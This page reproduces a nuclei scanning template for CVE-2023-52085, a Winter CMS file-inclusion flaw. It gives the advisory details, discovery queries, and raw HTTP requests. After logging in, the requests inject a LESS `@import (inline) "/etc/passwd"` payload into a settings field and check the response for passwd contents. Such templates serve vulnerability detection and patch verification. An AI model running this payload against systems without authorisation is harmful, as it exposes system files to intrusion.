Winter CMS Local File Inclusion - (LFI)

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Winter CMS ColorPicker FormWidget allows Local File Inclusion (LFI) in v1.2.

Code
id: CVE-2023-52085

info:
  name: Winter CMS Local File Inclusion - (LFI)
  author: sanineng
  severity: medium
  description: |
    Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
  impact: |
    Authenticated attackers can include local files via LESS compilation, potentially exposing sensitive file contents and system paths.
  remediation: |
    Upgrade Winter CMS to version 1.2.4 or later.
  reference:
    - https://github.com/wintercms/winter/security/advisories/GHSA-2x7r-93ww-cxrq
    - https://nvd.nist.gov/vuln/detail/CVE-2023-52085
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-52085
    cwe-id: CWE-22
    epss-score: 0.30166
    epss-percentile: 0.97992
    cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: wintercms
    product: winter
    shodan-query:
      - "title:\"Winter CMS\""
      - http.title:"winter cms"
    fofa-query:
      - "title=\"Winter CMS\""
      - title="winter cms"
    google-query: intitle:"winter cms"
  tags: cve,cve2023,authenticated,lfi,wintercms,vuln

http:
  - raw:
      - |
        GET /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{_token}}&postback=1&login={{username}}&password={{password}}

      - |
        POST /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-WINTER-REQUEST-HANDLER: onSave
        X-WINTER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0

      - |
        GET /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: regex
        part: body_4
        regex:
          - "root:[x*]:0:0:"

    extractors:
      - type: regex
        part: body
        name: _token
        group: 1
        regex:
          - '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
        internal: true
# digest: 4a0a0047304502210083e2b8de71918d6c3691d0f27c7ec6dde9126bd34d53ab8a478abd0cc5cbe64f022056aebda3eb84c8c2bf30f317287d2185580c077b95584435668ae3416df873cc:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 3.3 - 5.4
EPSS: 0.30166